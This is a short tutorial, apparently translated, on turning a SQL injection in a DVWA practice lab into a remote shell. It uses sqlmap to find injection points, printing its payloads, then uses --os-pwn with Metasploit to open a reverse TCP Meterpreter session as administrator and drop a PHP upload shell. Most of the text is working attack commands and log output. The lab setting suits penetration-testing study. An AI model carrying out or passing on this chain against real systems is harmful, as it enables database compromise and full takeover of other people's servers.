Sqlmap combined with Meterpreter to realize injected infiltration return to shell

Build a Php+mysql platform, the range for DVWA, set the SQL injection range level of low (easy to test use).
Enter 1 in the Submit box, grab the package with Burp, copy the package data to the Cookies.txt document, and drag to the Kali environment.
root@kali:~# sqlmap-r "/root/cookies.txt"
Return:
Sqlmap resumed the following injection point (s) from stored session:
---
Parameter:id (GET)
Type:boolean-based Blind
Title:or boolean-based blind-where OR HAVING clause (MySQL comment)
payload:id=-1890 ' OR 7466=7466#&submit=submit
Type:error-based
Title:mysql or error-based-where or HAVING clause
payload:id=-6878 ' OR 1 GROUP by CONCAT (0x7162626271, (SELECT case when (5403=5403) THEN 1 ELSE 0 end), 0x716b766271,floor (RAND (0) *2)) Having MIN (0) #&submit=submit
type:and/or time-based Blind
Title:mysql >= 5.0.12 and time-based Blind (select-comment)
Payload:id= ' and (SELECT * FROM (SELECT (5)) Dgpu) #&submit=submit
Type:union Query
Title:mysql UNION Query (NULL)-2 columns
Payload:id= ' UNION all SELECT null,concat (0x7162626271,0x4c4266596d5953594265,0x716b766271) #&submit=submit
---
[13:45:05] [INFO] The back-end DBMS is MySQL
Web server operating System:windows
Web application technology:php 5.3.29, Apache 2.4.10
Back-end Dbms:mysql 5.0.12
[13:45:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.8 '

After the injection point is identified:
root@kali:~# sqlmap-r "/root/cookies.txt"--os-pwn--msf-path=/opt/metasploit
Partially omitted
How does your want to establish the tunnel?
[1] tcp:metasploit Framework (default)
[2] icmp:icmpsh-icmp tunneling
> 1 (TCP connection shell using Metasploit)

Which Web application language does the Web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP
> 4 (PHP script)

What do your want to use for writable directory?
[1] Common location (s) (' c:/xampp/htdocs/, c:/inetpub/wwwroot/') (default)
[2] Custom location (s)
[3] Custom Directory list file
[4] Brute force search
> 2 (custom path)
Please provide a comma separate list of absolute directory paths:d:/www/dvwa/(enter absolute path)

Which connection type do your want to use?
[1] Reverse tcp:connect back from the "database host to" This machine (default)
[2] Reverse tcp:try to connect the "back" to "this machine", "all ports between" specified and 65535
[3] Reverse http:connect back from the "Database host to" machine tunnelling traffic over HTTP
[4] Reverse https:connect back from the "Database host to" machine tunnelling traffic over HTTPS
[5] Bind Tcp:listen on the database host for a connection
> 1 (TCP Reverse connection shell)
What is the local address? [Enter for ' 192.168.1.104 ' (detected)]
Which local port number does you want to use? [16308]
Which payload do your want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 1 (Meterpreter Shell)

Partially omitted
PAYLOAD => windows/meterpreter/reverse_tcp
Exitfunc => Process
Lport => 16308
Lhost => 192.168.1.104
[*] Started reverse handler on 192.168.1.104:16308
[*] Starting the payload handler ...
[13:46:43] [INFO] running Metasploit Framework shellcode remotely via shellcodeexec, please wait.
[*] Sending stage (957487 bytes) to 192.168.1.8
[*] Meterpreter Session 1 opened (192.168.1.104:16308-> 192.168.1.8:37639) at 2016-01-17 13:46:45 +0800
Meterpreter > Loading extension espia...success.
Meterpreter > Loading extension incognito...success.
Meterpreter > Computer:pgos
Os:windows 7 (Build 7601, Service Pack 1).
Architecture:x64 (current Process is WOW64)
System LANGUAGE:ZH_CN
Domain:workgroup
Logged on Users:1
Meterpreter:x86/win32
Meterpreter > Server username:pgos\administrator
Meterpreter >
At the same time, the DVWA directory will generate a random PHP upload shell.